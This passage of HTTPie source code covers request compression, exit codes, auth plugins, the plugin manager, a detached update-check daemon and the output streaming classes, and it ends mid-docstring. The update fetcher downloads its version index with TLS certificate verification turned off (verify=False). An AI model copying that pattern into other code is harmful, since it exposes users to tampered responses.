content_type: content_type = content_type.strip() if 'boundary=' not in content_type: content_type = f'{content_type}; boundary={encoder.boundary_value}' else: content_type = encoder.content_type data = encoder return data, content_type def compress_request( request: requests.PreparedRequest, always: bool, ): deflater = zlib.compressobj() if isinstance(request.body, str): body_bytes = request.body.encode() elif hasattr(request.body, 'read'): body_bytes = request.body.read() else: body_bytes = request.body deflated_data = deflater.compress(body_bytes) deflated_data += deflater.flush() is_economical = len(deflated_data) < len(body_bytes) if is_economical or always: request.body = deflated_data request.headers['Content-Encoding'] = 'deflate' request.headers['Content-Length'] = str(len(deflated_data)) File: httpie/__main__.py """The main entry point. Invoke as `http' or `python -m httpie'. 
""" def main(): try: from httpie.core import main exit_status = main() except KeyboardInterrupt: from httpie.status import ExitStatus exit_status = ExitStatus.ERROR_CTRL_C return exit_status.value if __name__ == '__main__': # pragma: nocover import sys sys.exit(main()) File: httpie/status.py from enum import IntEnum, unique @unique class ExitStatus(IntEnum): """Program exit status code constants.""" SUCCESS = 0 ERROR = 1 ERROR_TIMEOUT = 2 # See --check-status ERROR_HTTP_3XX = 3 ERROR_HTTP_4XX = 4 ERROR_HTTP_5XX = 5 ERROR_TOO_MANY_REDIRECTS = 6 PLUGIN_ERROR = 7 # 128+2 SIGINT # <http://www.tldp.org/LDP/abs/html/exitcodes.html> ERROR_CTRL_C = 130 def http_status_to_exit_status(http_status: int, follow=False) -> ExitStatus: """ Translate HTTP status code to exit status code. (Relevant only when invoked with --check-status or --download.) """ if 300 <= http_status <= 399 and not follow: # Redirect return ExitStatus.ERROR_HTTP_3XX elif 400 <= http_status <= 499: # Client Error return ExitStatus.ERROR_HTTP_4XX elif 500 <= http_status <= 599: # Server Error return ExitStatus.ERROR_HTTP_5XX else: return ExitStatus.SUCCESS File: httpie/adapters.py from httpie.cli.dicts import HTTPHeadersDict from requests.adapters import HTTPAdapter class HTTPieHTTPAdapter(HTTPAdapter): def build_response(self, req, resp): """Wrap the original headers with the `HTTPHeadersDict` to preserve multiple headers that have the same name""" response = super().build_response(req, resp) response.headers = HTTPHeadersDict(getattr(resp, 'headers', {})) return response File: httpie/plugins/registry.py from .manager import PluginManager from .builtin import BasicAuthPlugin, DigestAuthPlugin, BearerAuthPlugin from ..output.formatters.headers import HeadersFormatter from ..output.formatters.json import JSONFormatter from ..output.formatters.xml import XMLFormatter from ..output.formatters.colors import ColorFormatter plugin_manager = PluginManager() # Register all built-in plugins. plugin_manager.register( BasicAuthPlugin, DigestAuthPlugin, BearerAuthPlugin, HeadersFormatter, JSONFormatter, XMLFormatter, ColorFormatter, ) File: httpie/plugins/__init__.py """ WARNING: The plugin API is still work in progress and will probably be completely reworked in the future. """ from .base import ( AuthPlugin, FormatterPlugin, ConverterPlugin, TransportPlugin ) __all__ = ('AuthPlugin', 'ConverterPlugin', 'FormatterPlugin', 'TransportPlugin') File: httpie/plugins/builtin.py from base64 import b64encode import requests.auth from .base import AuthPlugin # noinspection PyAbstractClass class BuiltinAuthPlugin(AuthPlugin): package_name = '(builtin)' class HTTPBasicAuth(requests.auth.HTTPBasicAuth): def __call__( self, request: requests.PreparedRequest ) -> requests.PreparedRequest: """ Override username/password serialization to allow unicode. 
See https://github.com/httpie/cli/issues/212 """ # noinspection PyTypeChecker request.headers['Authorization'] = type(self).make_header( self.username, self.password).encode('latin1') return request @staticmethod def make_header(username: str, password: str) -> str: credentials = f'{username}:{password}' token = b64encode(credentials.encode()).strip().decode('latin1') return f'Basic {token}' class HTTPBearerAuth(requests.auth.AuthBase): def __init__(self, token: str) -> None: self.token = token def __call__(self, request: requests.PreparedRequest) -> requests.PreparedRequest: request.headers['Authorization'] = f'Bearer {self.token}' return request class BasicAuthPlugin(BuiltinAuthPlugin): name = 'Basic HTTP auth' auth_type = 'basic' netrc_parse = True # noinspection PyMethodOverriding def get_auth(self, username: str, password: str) -> HTTPBasicAuth: return HTTPBasicAuth(username, password) class DigestAuthPlugin(BuiltinAuthPlugin): name = 'Digest HTTP auth' auth_type = 'digest' netrc_parse = True # noinspection PyMethodOverriding def get_auth( self, username: str, password: str ) -> requests.auth.HTTPDigestAuth: return requests.auth.HTTPDigestAuth(username, password) class BearerAuthPlugin(BuiltinAuthPlugin): name = 'Bearer HTTP Auth' auth_type = 'bearer' netrc_parse = False auth_parse = False # noinspection PyMethodOverriding def get_auth(self, **kwargs) -> requests.auth.HTTPDigestAuth: return HTTPBearerAuth(self.raw_auth) File: httpie/plugins/manager.py import sys import os import warnings from itertools import groupby from operator import attrgetter from typing import Dict, List, Type, Iterator, Iterable, Optional, ContextManager from pathlib import Path from contextlib import contextmanager, nullcontext from ..compat import importlib_metadata, find_entry_points, get_dist_name from ..utils import repr_dict, get_site_paths from . 
import AuthPlugin, ConverterPlugin, FormatterPlugin, TransportPlugin from .base import BasePlugin ENTRY_POINT_CLASSES = { 'httpie.plugins.auth.v1': AuthPlugin, 'httpie.plugins.converter.v1': ConverterPlugin, 'httpie.plugins.formatter.v1': FormatterPlugin, 'httpie.plugins.transport.v1': TransportPlugin } ENTRY_POINT_NAMES = list(ENTRY_POINT_CLASSES.keys()) @contextmanager def _load_directories(site_dirs: Iterable[Path]) -> Iterator[None]: plugin_dirs = [ os.fspath(site_dir) for site_dir in site_dirs ] sys.path.extend(plugin_dirs) try: yield finally: for plugin_dir in plugin_dirs: sys.path.remove(plugin_dir) def enable_plugins(plugins_dir: Optional[Path]) -> ContextManager[None]: if plugins_dir is None: return nullcontext() else: return _load_directories(get_site_paths(plugins_dir)) class PluginManager(list): def register(self, *plugins: Type[BasePlugin]): for plugin in plugins: self.append(plugin) def unregister(self, plugin: Type[BasePlugin]): self.remove(plugin) def filter(self, by_type=Type[BasePlugin]): return [plugin for plugin in self if issubclass(plugin, by_type)] def iter_entry_points(self, directory: Optional[Path] = None): with enable_plugins(directory): eps = importlib_metadata.entry_points() for entry_point_name in ENTRY_POINT_NAMES: yield from find_entry_points(eps, group=entry_point_name) def load_installed_plugins(self, directory: Optional[Path] = None): for entry_point in self.iter_entry_points(directory): plugin_name = get_dist_name(entry_point) try: plugin = entry_point.load() except BaseException as exc: warnings.warn( f'While loading "{plugin_name}", an error occurred: {exc}\n' f'For uninstallations, please use either "httpie plugins uninstall {plugin_name}" ' f'or "pip uninstall {plugin_name}" (depending on how you installed it in the first ' 'place).' ) continue plugin.package_name = plugin_name self.register(plugin) # Auth def get_auth_plugins(self) -> List[Type[AuthPlugin]]: return self.filter(AuthPlugin) def get_auth_plugin_mapping(self) -> Dict[str, Type[AuthPlugin]]: return { plugin.auth_type: plugin for plugin in self.get_auth_plugins() } def get_auth_plugin(self, auth_type: str) -> Type[AuthPlugin]: return self.get_auth_plugin_mapping()[auth_type] # Output processing def get_formatters(self) -> List[Type[FormatterPlugin]]: return self.filter(FormatterPlugin) def get_formatters_grouped(self) -> Dict[str, List[Type[FormatterPlugin]]]: return { group_name: list(group) for group_name, group in groupby(self.get_formatters(), key=attrgetter('group_name')) } def get_converters(self) -> List[Type[ConverterPlugin]]: return self.filter(ConverterPlugin) # Adapters def get_transport_plugins(self) -> List[Type[TransportPlugin]]: return self.filter(TransportPlugin) def __str__(self): return repr_dict({ 'adapters': self.get_transport_plugins(), 'auth': self.get_auth_plugins(), 'converters': self.get_converters(), 'formatters': self.get_formatters(), }) def __repr__(self): return f'<{type(self).__name__} {self}>' File: httpie/plugins/base.py from typing import Tuple class BasePlugin: # The name of the plugin, eg. "My auth". name = None # Optional short description. It will be shown in the help # under --auth-type. description = None # This be set automatically once the plugin has been loaded. package_name = None class AuthPlugin(BasePlugin): """ Base auth plugin class. See httpie-ntlm for an example auth plugin: <https://github.com/httpie/httpie-ntlm> See also `test_auth_plugins.py` """ # The value that should be passed to --auth-type # to use this auth plugin. Eg. 
"my-auth" auth_type = None # Set to `False` to make it possible to invoke this auth # plugin without requiring the user to specify credentials # through `--auth, -a`. auth_require = True # By default the `-a` argument is parsed for `username:password`. # Set this to `False` to disable the parsing and error handling. auth_parse = True # Set to `True` to make it possible for this auth # plugin to acquire credentials from the user’s netrc file(s). # It is used as a fallback when the credentials are not provided explicitly # through `--auth, -a`. Enabling this will allow skipping `--auth, -a` # even when `auth_require` is set `True` (provided that netrc provides # credential for a given host). netrc_parse = False # If both `auth_parse` and `prompt_password` are set to `True`, # and the value of `-a` lacks the password part, # then the user will be prompted to type the password in. prompt_password = True # Will be set to the raw value of `-a` (if provided) before # `get_auth()` gets called. If the credentials came from a netrc file, # then this is `None`. raw_auth = None def get_auth(self, username: str = None, password: str = None): """ If `auth_parse` is set to `True`, then `username` and `password` contain the parsed credentials. Use `self.raw_auth` to access the raw value passed through `--auth, -a`. Return a ``requests.auth.AuthBase`` subclass instance. """ raise NotImplementedError() class TransportPlugin(BasePlugin): """ Requests transport adapter docs: <https://requests.readthedocs.io/en/latest/user/advanced/#transport-adapters> See httpie-unixsocket for an example transport plugin: <https://github.com/httpie/httpie-unixsocket> """ # The URL prefix the adapter should be mount to. prefix = None def get_adapter(self): """ Return a ``requests.adapters.BaseAdapter`` subclass instance to be mounted to ``self.prefix``. """ raise NotImplementedError() class ConverterPlugin(BasePlugin): """ Possibly converts binary response data for prettified terminal display. See httpie-msgpack for an example converter plugin: <https://github.com/rasky/httpie-msgpack>. """ def __init__(self, mime: str): self.mime = mime def convert(self, body: bytes) -> Tuple[str, str]: """ Convert a binary body to a textual representation for the terminal and return a tuple containing the new Content-Type and content, e.g.: ('application/json', '{}') """ raise NotImplementedError @classmethod def supports(cls, mime: str) -> bool: raise NotImplementedError class FormatterPlugin(BasePlugin): """ Possibly formats response body & headers for prettified terminal display. """ group_name = 'format' def __init__(self, **kwargs): """ :param env: an class:`Environment` instance :param kwargs: additional keyword argument that some formatters might require. """ self.enabled = True self.kwargs = kwargs self.format_options = kwargs['format_options'] def format_headers(self, headers: str) -> str: """Return processed `headers` :param headers: The headers as text. """ return headers def format_body(self, content: str, mime: str) -> str: """Return processed `content`. :param mime: E.g., 'application/atom+xml'. :param content: The body content as text """ return content def format_metadata(self, metadata: str) -> str: """Return processed `metadata`. :param metadata: The metadata as text. """ return metadata File: httpie/internal/daemons.py """ This module provides an interface to spawn a detached task to be run with httpie.internal.daemon_runner on a separate process. It is based on DVC's daemon system. 
https://github.com/iterative/dvc/blob/main/dvc/daemon.py """ import inspect import os import platform import sys import httpie.__main__ from contextlib import suppress from subprocess import Popen, DEVNULL from typing import Dict, List from httpie.compat import is_frozen, is_windows ProcessContext = Dict[str, str] def _start_process(cmd: List[str], **kwargs) -> Popen: prefix = [sys.executable] # If it is frozen, sys.executable points to the binary (http). # Otherwise it points to the python interpreter. if not is_frozen: main_entrypoint = httpie.__main__.__file__ prefix += [main_entrypoint] return Popen(prefix + cmd, close_fds=True, shell=False, stdout=DEVNULL, stderr=DEVNULL, **kwargs) def _spawn_windows(cmd: List[str], process_context: ProcessContext) -> None: from subprocess import ( CREATE_NEW_PROCESS_GROUP, CREATE_NO_WINDOW, STARTF_USESHOWWINDOW, STARTUPINFO, ) # https://stackoverflow.com/a/7006424 # https://bugs.python.org/issue41619 creationflags = CREATE_NEW_PROCESS_GROUP | CREATE_NO_WINDOW startupinfo = STARTUPINFO() startupinfo.dwFlags |= STARTF_USESHOWWINDOW _start_process( cmd, env=process_context, creationflags=creationflags, startupinfo=startupinfo, ) def _spawn_posix(args: List[str], process_context: ProcessContext) -> None: """ Perform a double fork procedure* to detach from the parent process so that we don't block the user even if their original command's execution is done but the release fetcher is not. [1]: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap11.html#tag_11_01_03 """ from httpie.core import main try: pid = os.fork() if pid > 0: return except OSError: os._exit(1) os.setsid() try: pid = os.fork() if pid > 0: os._exit(0) except OSError: os._exit(1) # Close all standard inputs/outputs sys.stdin.close() sys.stdout.close() sys.stderr.close() if platform.system() == 'Darwin': # Double-fork is not reliable on MacOS, so we'll use a subprocess # to ensure the task is isolated properly. process = _start_process(args, env=process_context) # Unlike windows, since we already completed the fork procedure # we can simply join the process and wait for it. process.communicate() else: os.environ.update(process_context) with suppress(BaseException): main(['http'] + args) os._exit(0) def _spawn(args: List[str], process_context: ProcessContext) -> None: """ Spawn a new process to run the given command. """ if is_windows: _spawn_windows(args, process_context) else: _spawn_posix(args, process_context) def spawn_daemon(task: str) -> None: args = [task, '--daemon'] process_context = os.environ.copy() if not is_frozen: file_path = os.path.abspath(inspect.stack()[0][1]) process_context['PYTHONPATH'] = os.path.dirname( os.path.dirname(os.path.dirname(file_path)) ) _spawn(args, process_context) File: httpie/internal/daemon_runner.py import argparse from contextlib import redirect_stderr, redirect_stdout from typing import List from httpie.context import Environment from httpie.internal.update_warnings import _fetch_updates, _get_suppress_context from httpie.status import ExitStatus STATUS_FILE = '.httpie-test-daemon-status' def _check_status(env): # This function is used only for the testing (test_update_warnings). # Since we don't want to trigger the fetch_updates (which would interact # with real world resources), we'll only trigger this pseudo task # and check whether the STATUS_FILE is created or not. 
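    # Illustrative flow (names from this module): spawn_daemon('check_status')
    # runs the equivalent of `http check_status --daemon`, and run_daemon_task()
    # dispatches that back to this function through DAEMONIZED_TASKS.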
import tempfile from pathlib import Path status_file = Path(tempfile.gettempdir()) / STATUS_FILE status_file.touch() DAEMONIZED_TASKS = { 'check_status': _check_status, 'fetch_updates': _fetch_updates, } def _parse_options(args: List[str]) -> argparse.Namespace: parser = argparse.ArgumentParser() parser.add_argument('task_id') parser.add_argument('--daemon', action='store_true') return parser.parse_known_args(args)[0] def is_daemon_mode(args: List[str]) -> bool: return '--daemon' in args def run_daemon_task(env: Environment, args: List[str]) -> ExitStatus: options = _parse_options(args) assert options.daemon assert options.task_id in DAEMONIZED_TASKS with redirect_stdout(env.devnull), redirect_stderr(env.devnull): with _get_suppress_context(env): DAEMONIZED_TASKS[options.task_id](env) return ExitStatus.SUCCESS File: httpie/internal/__init__.py File: httpie/internal/update_warnings.py import json from contextlib import nullcontext, suppress from datetime import datetime, timedelta from pathlib import Path from typing import Any, Optional, Callable import requests import httpie from httpie.context import Environment, LogLevel from httpie.internal.__build_channel__ import BUILD_CHANNEL from httpie.internal.daemons import spawn_daemon from httpie.utils import is_version_greater, open_with_lockfile # Automatically updated package version index. PACKAGE_INDEX_LINK = 'https://packages.httpie.io/latest.json' FETCH_INTERVAL = timedelta(weeks=2) WARN_INTERVAL = timedelta(weeks=1) UPDATE_MESSAGE_FORMAT = """\ A new HTTPie release ({last_released_version}) is available. To see how you can update, please visit https://httpie.io/docs/cli/{installation_method} """ ALREADY_UP_TO_DATE_MESSAGE = """\ You are already up-to-date. """ def _read_data_error_free(file: Path) -> Any: # If the file is broken / non-existent, ignore it. try: with open(file) as stream: return json.load(stream) except (ValueError, OSError): return {} def _fetch_updates(env: Environment) -> str: file = env.config.version_info_file data = _read_data_error_free(file) response = requests.get(PACKAGE_INDEX_LINK, verify=False) response.raise_for_status() data.setdefault('last_warned_date', None) data['last_fetched_date'] = datetime.now().isoformat() data['last_released_versions'] = response.json() with open_with_lockfile(file, 'w') as stream: json.dump(data, stream) def fetch_updates(env: Environment, lazy: bool = True): if lazy: spawn_daemon('fetch_updates') else: _fetch_updates(env) def maybe_fetch_updates(env: Environment) -> None: if env.config.get('disable_update_warnings'): return None data = _read_data_error_free(env.config.version_info_file) if data: current_date = datetime.now() last_fetched_date = datetime.fromisoformat(data['last_fetched_date']) earliest_fetch_date = last_fetched_date + FETCH_INTERVAL if current_date < earliest_fetch_date: return None fetch_updates(env) def _get_suppress_context(env: Environment) -> Any: """Return a context manager that suppress all possible errors. 
Note: if you have set the developer_mode=True in your config, then it will show all errors for easier debugging.""" if env.config.developer_mode: return nullcontext() else: return suppress(BaseException) def _update_checker( func: Callable[[Environment], None] ) -> Callable[[Environment], None]: """Control the execution of the update checker (suppress errors, trigger auto updates etc.)""" def wrapper(env: Environment) -> None: with _get_suppress_context(env): func(env) with _get_suppress_context(env): maybe_fetch_updates(env) return wrapper def _get_update_status(env: Environment) -> Optional[str]: """If there is a new update available, return the warning text. Otherwise just return None.""" file = env.config.version_info_file if not file.exists(): return None with _get_suppress_context(env): # If the user quickly spawns multiple httpie processes # we don't want to end in a race. with open_with_lockfile(file) as stream: version_info = json.load(stream) available_channels = version_info['last_released_versions'] if BUILD_CHANNEL not in available_channels: return None current_version = httpie.__version__ last_released_version = available_channels[BUILD_CHANNEL] if not is_version_greater(last_released_version, current_version): return None text = UPDATE_MESSAGE_FORMAT.format( last_released_version=last_released_version, installation_method=BUILD_CHANNEL, ) return text def get_update_status(env: Environment) -> str: return _get_update_status(env) or ALREADY_UP_TO_DATE_MESSAGE @_update_checker def check_updates(env: Environment) -> None: if env.config.get('disable_update_warnings'): return None file = env.config.version_info_file update_status = _get_update_status(env) if not update_status: return None # If the user quickly spawns multiple httpie processes # we don't want to end in a race. with open_with_lockfile(file) as stream: version_info = json.load(stream) # We don't want to spam the user with too many warnings, # so we'll only warn every once a while (WARN_INTERNAL). current_date = datetime.now() last_warned_date = version_info['last_warned_date'] if last_warned_date is not None: earliest_warn_date = ( datetime.fromisoformat(last_warned_date) + WARN_INTERVAL ) if current_date < earliest_warn_date: return None env.log_error(update_status, level=LogLevel.INFO) version_info['last_warned_date'] = current_date.isoformat() with open_with_lockfile(file, 'w') as stream: json.dump(version_info, stream) File: httpie/internal/__build_channel__.py # Represents the packaging method. This file should # be overridden by every build system we support on # the packaging step. 
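# Illustrative example (hypothetical channel name): a Debian packaging step
# could rewrite this file as `BUILD_CHANNEL = 'deb'`; update_warnings.py then
# uses that value to look up the latest release for the channel and to build
# the https://httpie.io/docs/cli/<channel> installation link.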
BUILD_CHANNEL = 'unknown' File: httpie/output/streams.py from abc import ABCMeta, abstractmethod from itertools import chain from typing import Callable, Iterable, Optional, Union from .processing import Conversion, Formatting from ..context import Environment from ..encoding import smart_decode, smart_encode, UTF8 from ..models import HTTPMessage, OutputOptions from ..utils import parse_content_type_header BINARY_SUPPRESSED_NOTICE = ( b'\n' b'+-----------------------------------------+\n' b'| NOTE: binary data not shown in terminal |\n' b'+-----------------------------------------+' ) class DataSuppressedError(Exception): message = None class BinarySuppressedError(DataSuppressedError): """An error indicating that the body is binary and won't be written, e.g., for terminal output).""" message = BINARY_SUPPRESSED_NOTICE class BaseStream(metaclass=ABCMeta): """Base HTTP message output stream class.""" def __init__( self, msg: HTTPMessage, output_options: OutputOptions, on_body_chunk_downloaded: Callable[[bytes], None] = None, **kwargs ): """ :param msg: a :class:`models.HTTPMessage` subclass :param output_options: a :class:`OutputOptions` instance to represent which parts of the message is printed. """ assert output_options.any() self.msg = msg self.output_options = output_options self.on_body_chunk_downloaded = on_body_chunk_downloaded self.extra_options = kwargs def get_headers(self) -> bytes: """Return the headers' bytes.""" return self.msg.headers.encode() def get_metadata(self) -> bytes: """Return the message metadata.""" return self.msg.metadata.encode() @abstractmethod def iter_body(self) -> Iterable[bytes]: """Return an iterator over the message body.""" def __iter__(self) -> Iterable[bytes]: """Return an iterator over `self.msg`.""" if self.output_options.headers: yield self.get_headers() yield b'\r\n\r\n' if self.output_options.body: try: for chunk in self.iter_body(): yield chunk if self.on_body_chunk_downloaded: self.on_body_chunk_downloaded(chunk) except DataSuppressedError as e: if self.output_options.headers: yield b'\n' yield e.message if self.output_options.meta: if self.output_options.body: yield b'\n\n' yield self.get_metadata() yield b'\n\n' class RawStream(BaseStream): """The message is streamed in chunks with no processing.""" CHUNK_SIZE = 1024 * 100 CHUNK_SIZE_BY_LINE = 1 def __init__(self, chunk_size=CHUNK_SIZE, **kwargs): super().__init__(**kwargs) self.chunk_size = chunk_size def iter_body(self) -> Iterable[bytes]: return self.msg.iter_body(self.chunk_size) ENCODING_GUESS_THRESHOLD = 3 class EncodedStream(BaseStream): """Encoded HTTP message stream. The message bytes are converted to an encoding suitable for `self.env.stdout`. Unicode errors are replaced and binary data is suppressed. The body is always streamed by line. """ CHUNK_SIZE = 1 def __init__( self, env=Environment(), mime_overwrite: str = None, encoding_overwrite: str = None, **kwargs ): super().__init__(**kwargs) if mime_overwrite: self.mime = mime_overwrite else: self.mime, _ = parse_content_type_header(self.msg.content_type) self._encoding = encoding_overwrite or self.msg.encoding self._encoding_guesses = [] if env.stdout_isatty: # Use the encoding supported by the terminal. output_encoding = env.stdout_encoding else: # Preserve the message encoding. output_encoding = self.msg.encoding # Default to UTF-8 when unsure. 
self.output_encoding = output_encoding or UTF8 def iter_body(self) -> Iterable[bytes]: for line, lf in self.msg.iter_lines(self.CHUNK_SIZE): if b'\0' in line: raise BinarySuppressedError() line = self.decode_chunk(line) yield smart_encode(line, self.output_encoding) + lf def decode_chunk(self, raw_chunk: str) -> str: chunk, guessed_encoding = smart_decode(raw_chunk, self.encoding) self._encoding_guesses.append(guessed_encoding) return chunk @property def encoding(self) -> Optional[str]: if self._encoding: return self._encoding # If we find a reliable (used consecutively) encoding, than # use it for the next iterations. if len(self._encoding_guesses) < ENCODING_GUESS_THRESHOLD: return None guess_1, guess_2 = self._encoding_guesses[-2:] if guess_1 == guess_2: self._encoding = guess_1 return guess_1 @encoding.setter def encoding(self, value) -> None: self._encoding = value class PrettyStream(EncodedStream): """In addition to :class:`EncodedStream` behaviour, this stream applies content processing. Useful for long-lived HTTP responses that stream by lines such as the Twitter streaming API. """ CHUNK_SIZE = 1 def __init__( self, conversion: Conversion, formatting: Formatting, **kwargs, ): super().__init__(**kwargs) self.formatting = formatting self.conversion = conversion def get_headers(self) -> bytes: return self.formatting.format_headers( self.msg.headers).encode(self.output_encoding) def get_metadata(self) -> bytes: return self.formatting.format_metadata( self.msg.metadata).encode(self.output_encoding) def iter_body(self) -> Iterable[bytes]: first_chunk = True iter_lines = self.msg.iter_lines(self.CHUNK_SIZE) for line, lf in iter_lines: if b'\0' in line: if first_chunk: converter = self.conversion.get_converter(self.mime) if converter: body = bytearray() # noinspection PyAssignmentToLoopOrWithParameter for line, lf in chain([(line, lf)], iter_lines): body.extend(line) body.extend(lf) self.mime, body = converter.convert(body) assert isinstance(body, str) yield self.process_body(body) return raise BinarySuppressedError() yield self.process_body(line) + lf first_chunk = False def process_body(self, chunk: Union[str, bytes]) -> bytes: if not isinstance(chunk, str): # Text when a converter has been used, # otherwise it will always be bytes. chunk = self.decode_chunk(chunk) chunk = self.formatting.format_body(content=chunk, mime=self.mime) return smart_encode(chunk, self.output_encoding) class BufferedPrettyStream(PrettyStream): """The same as :class:`PrettyStream` except that the body is fully fetched before it's processed. Suitable regular HTTP responses. """ CHUNK_SIZE = 1024 * 10 def iter_body(self) -> Iterable[bytes]: # Read the whole body before prettifying it, # but bail out immediately if the body is binary. 
converter = None body = bytearray() for chunk in self.msg.iter_body(self.CHUNK_SIZE): if not converter and b'\0' in chunk: converter = self.conversion.get_converter(self.mime) if not converter: raise BinarySuppressedError() body.extend(chunk) if converter: self.mime, body = converter.convert(body) yield self.process_body(body) File: httpie/output/models.py import argparse from typing import Any, Dict, Union, List, NamedTuple, Optional from httpie.context import Environment from httpie.cli.constants import PrettyOptions, PRETTY_MAP, PRETTY_STDOUT_TTY_ONLY from httpie.cli.argtypes import PARSED_DEFAULT_FORMAT_OPTIONS from httpie.output.formatters.colors import AUTO_STYLE class ProcessingOptions(NamedTuple): """Represents a set of stylistic options that are used when deciding which stream should be used.""" debug: bool = False traceback: bool = False stream: bool = False style: str = AUTO_STYLE prettify: Union[List[str], PrettyOptions] = PRETTY_STDOUT_TTY_ONLY response_mime: Optional[str] = None response_charset: Optional[str] = None json: bool = False format_options: Dict[str, Any] = PARSED_DEFAULT_FORMAT_OPTIONS def get_prettify(self, env: Environment) -> List[str]: if self.prettify is PRETTY_STDOUT_TTY_ONLY: return PRETTY_MAP['all' if env.stdout_isatty else 'none'] else: return self.prettify @classmethod def from_raw_args(cls, options: argparse.Namespace) -> 'ProcessingOptions': fetched_options = { option: getattr(options, option) for option in cls._fields } return cls(**fetched_options) @property def show_traceback(self): return self.debug or self.traceback File: httpie/output/__init__.py File: httpie/output/utils.py import json import re from typing import Tuple from ..utils import load_json_preserve_order_and_dupe_keys from .lexers.json import PREFIX_REGEX def load_prefixed_json(data: str) -> Tuple[str, json.JSONDecoder]: """Simple JSON loading from `data`. """ # First, the full data. try: return '', load_json_preserve_order_and_dupe_keys(data) except ValueError: pass # Then, try to find the start of the actual body. data_prefix, body = parse_prefixed_json(data) try: return data_prefix, load_json_preserve_order_and_dupe_keys(body) except ValueError: raise ValueError('Invalid JSON') def parse_prefixed_json(data: str) -> Tuple[str, str]: """Find the potential JSON body from `data`. Sometimes the JSON body is prefixed with a XSSI magic string, specific to the server. Return a tuple (data prefix, actual JSON body). 
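    Illustration (hypothetical XSSI prefix): for an input consisting of ")]}'"
    plus a newline followed by '{"a": 1}', this returns the ")]}'" prefix
    (newline included) as the first element and '{"a": 1}' as the body.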
""" matches = re.findall(PREFIX_REGEX, data) data_prefix = matches[0] if matches else '' body = data[len(data_prefix):] return data_prefix, body File: httpie/output/writer.py import errno import requests from typing import Any, Dict, IO, Optional, TextIO, Tuple, Type, Union from ..cli.dicts import HTTPHeadersDict from ..context import Environment from ..models import ( HTTPRequest, HTTPResponse, HTTPMessage, RequestsMessage, RequestsMessageKind, OutputOptions, ) from .models import ProcessingOptions from .processing import Conversion, Formatting from .streams import ( BaseStream, BufferedPrettyStream, EncodedStream, PrettyStream, RawStream, ) from ..utils import parse_content_type_header MESSAGE_SEPARATOR = '\n\n' MESSAGE_SEPARATOR_BYTES = MESSAGE_SEPARATOR.encode() def write_message( requests_message: RequestsMessage, env: Environment, output_options: OutputOptions, processing_options: ProcessingOptions, extra_stream_kwargs: Optional[Dict[str, Any]] = None ): if not output_options.any(): return write_stream_kwargs = { 'stream': build_output_stream_for_message( env=env, requests_message=requests_message, output_options=output_options, processing_options=processing_options, extra_stream_kwargs=extra_stream_kwargs ), # NOTE: `env.stdout` will in fact be `stderr` with `--download` 'outfile': env.stdout, 'flush': env.stdout_isatty or processing_options.stream } try: if env.is_windows and 'colors' in processing_options.get_prettify(env): write_stream_with_colors_win(**write_stream_kwargs) else: write_stream(**write_stream_kwargs) except OSError as e: if processing_options.show_traceback and e.errno == errno.EPIPE: # Ignore broken pipes unless --traceback. env.stderr.write('\n') else: raise def write_stream( stream: BaseStream, outfile: Union[IO, TextIO], flush: bool ): """Write the output stream.""" try: # Writing bytes so we use the buffer interface. buf = outfile.buffer except AttributeError: buf = outfile for chunk in stream: buf.write(chunk) if flush: outfile.flush() def write_stream_with_colors_win( stream: 'BaseStream', outfile: TextIO, flush: bool ): """Like `write`, but colorized chunks are written as text directly to `outfile` to ensure it gets processed by colorama. Applies only to Windows and colorized terminal output. 
""" color = b'\x1b[' encoding = outfile.encoding for chunk in stream: if color in chunk: outfile.write(chunk.decode(encoding)) else: outfile.buffer.write(chunk) if flush: outfile.flush() def write_raw_data( env: Environment, data: Any, *, processing_options: Optional[ProcessingOptions] = None, headers: Optional[HTTPHeadersDict] = None, stream_kwargs: Optional[Dict[str, Any]] = None ): msg = requests.PreparedRequest() msg.is_body_upload_chunk = True msg.body = data msg.headers = headers or HTTPHeadersDict() msg_output_options = OutputOptions.from_message(msg, body=True, headers=False) return write_message( requests_message=msg, env=env, output_options=msg_output_options, processing_options=processing_options or ProcessingOptions(), extra_stream_kwargs=stream_kwargs ) def build_output_stream_for_message( env: Environment, requests_message: RequestsMessage, output_options: OutputOptions, processing_options: ProcessingOptions, extra_stream_kwargs: Optional[Dict[str, Any]] = None ): message_type = { RequestsMessageKind.REQUEST: HTTPRequest, RequestsMessageKind.RESPONSE: HTTPResponse, }[output_options.kind] stream_class, stream_kwargs = get_stream_type_and_kwargs( env=env, processing_options=processing_options, message_type=message_type, headers=requests_message.headers ) if extra_stream_kwargs: stream_kwargs.update(extra_stream_kwargs) yield from stream_class( msg=message_type(requests_message), output_options=output_options, **stream_kwargs, ) if (env.stdout_isatty and output_options.body and not output_options.meta and not getattr(requests_message, 'is_body_upload_chunk', False)): # Ensure a blank line after the response body. # For terminal output only. yield MESSAGE_SEPARATOR_BYTES def get_stream_type_and_kwargs( env: Environment, processing_options: ProcessingOptions, message_type: Type[HTTPMessage], headers: HTTPHeadersDict, ) -> Tuple[Type['BaseStream'], dict]: """Pick the right stream type and kwargs for it based on `env` and `args`. """ is_stream = processing_options.stream prettify_groups = processing_options.get_prettify(env) if not is_stream and message_type is HTTPResponse: # If this is a response, then check the headers for determining # auto-streaming. 
raw_content_type_header = headers.get('Content-Type', None) if raw_content_type_header: content_type_header, _ = parse_content_type_header(raw_content_type_header) is_stream = (content_type_header == 'text/event-stream') if not env.stdout_isatty and not prettify_groups: stream_class = RawStream stream_kwargs = { 'chunk_size': ( RawStream.CHUNK_SIZE_BY_LINE if is_stream else RawStream.CHUNK_SIZE ) } else: stream_class = EncodedStream stream_kwargs = { 'env': env, } if message_type is HTTPResponse: stream_kwargs.update({ 'mime_overwrite': processing_options.response_mime, 'encoding_overwrite': processing_options.response_charset, }) if prettify_groups: stream_class = PrettyStream if is_stream else BufferedPrettyStream stream_kwargs.update({ 'conversion': Conversion(), 'formatting': Formatting( env=env, groups=prettify_groups, color_scheme=processing_options.style, explicit_json=processing_options.json, format_options=processing_options.format_options, ) }) return stream_class, stream_kwargs File: httpie/output/processing.py import re from typing import Optional, List from ..plugins import ConverterPlugin from ..plugins.registry import plugin_manager from ..context import Environment MIME_RE = re.compile(r'^[^/]+/[^/]+$') def is_valid_mime(mime): return mime and MIME_RE.match(mime) class Conversion: @staticmethod def get_converter(mime: str) -> Optional[ConverterPlugin]: if is_valid_mime(mime): for converter_class in plugin_manager.get_converters(): if converter_class.supports(mime): return converter_class(mime) class Formatting: """A delegate class that invokes the actual processors.""" def __init__(self, groups: List[str], env=Environment(), **kwargs): """ :param groups: names of processor 